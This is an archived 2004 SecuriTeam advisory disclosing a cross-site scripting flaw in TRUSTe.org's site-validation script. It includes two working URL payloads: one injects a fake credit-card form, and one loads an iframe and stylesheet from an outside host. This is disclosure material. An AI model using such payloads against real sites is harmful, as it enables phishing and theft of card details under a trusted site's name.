[NEWS] TRUSTe.org Cross Site Scripting and Phishing Opportunities

From: SecuriTeam (support_at_securiteam.com)
Date: 11/09/04

  • Next message: SecuriTeam: "[EXPL] CCProxy Log Stack Overflow" 
    To: list@securiteam.com
Date: 9 Nov 2004 18:40:55 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      TRUSTe.org Cross Site Scripting and Phishing Opportunities
    ------------------------------------------------------------------------

    SUMMARY

    TRUSTe is an independent, nonprofit organization dedicated to enabling
    individuals and organizations to establish trusting relationships based on
    respect for personal identity and information in the evolving networked
    world. Through extensive consumer and Web site research and the support
    and guidance of many established companies and industry experts, TRUSTe
    has earned a reputation as the leader in promoting privacy policy
    disclosure, informed user consent, and consumer education.

    One of TRUSTe.org services involves requesting whether a certain web site
    is TRUSTe validated or not. This service has been found to contain a cross
    site scripting vulnerability that opens up the TRUSTe web site to attack
    and allows also to use TRUSTe as a phishing source.

    DETAILS

    TRUSTe's 'ivalidate.php' is used to validate "trusted" sites. Whilst the
    script does add slashes to quotes and closes <script> and <style> tags,
    there are a number of HTML tags it does not strip, including
    <linK>,<div>,<iframe>. This leaves the site open to attack from phishers
    wanting to make their site appear "trusted".

    Examples:
    https://www.truste.org/ivalidate.php?url=%3Cfont%20size=5px%3EYou%20are%20not%20verified!%3C/font%3E%3Cbr%3E%3Cbr %3EQuick!%20Send%20us%20some%20money%20to%20fix%20this!%3Cform%20action=http://www.antiphishing.org/%3E%3CBR %3ECREDITCARDNUMBER:%3Cinput%20type=text%3E%3Cinput%20type=submit%3E%3C/form%3E%3Cbr%3E%3Cbr%3ETEH %20FLAP%20Strikes%20once%20again%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr %3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3CBR%3E%3CBR %3E%3CBR%3E%3CBR%3E

    https://www.truste.org/ivalidate.php?url=%3C/b%3E%3C/p%3E%3C/tr%3E%3C/tr%3E%3C/table%3E%3C/center%3E%3C/div%3E %3Clink%20href=http://wheresthebeef.co.uk/XSS/xss.css%20rel=style***%20type=text/css%3E%3Cdiv%20class=pwn%3E %3Ciframe%20src=http://wheresthebeef.co.uk/XSS/xss.htm%20height=1000px%20width=100%25%20FRAMEBORDER=0 %20SCROLLING=NO%3E%20%3C/iframe%3E%3C/div%3E

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:stfunub@gmail.com> Andrew
    Smith.
    The original article can be found at: <http://wheresthebeef.co.uk/XSS/>
    http://wheresthebeef.co.uk/XSS/

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] CCProxy Log Stack Overflow"

    Relevant Pages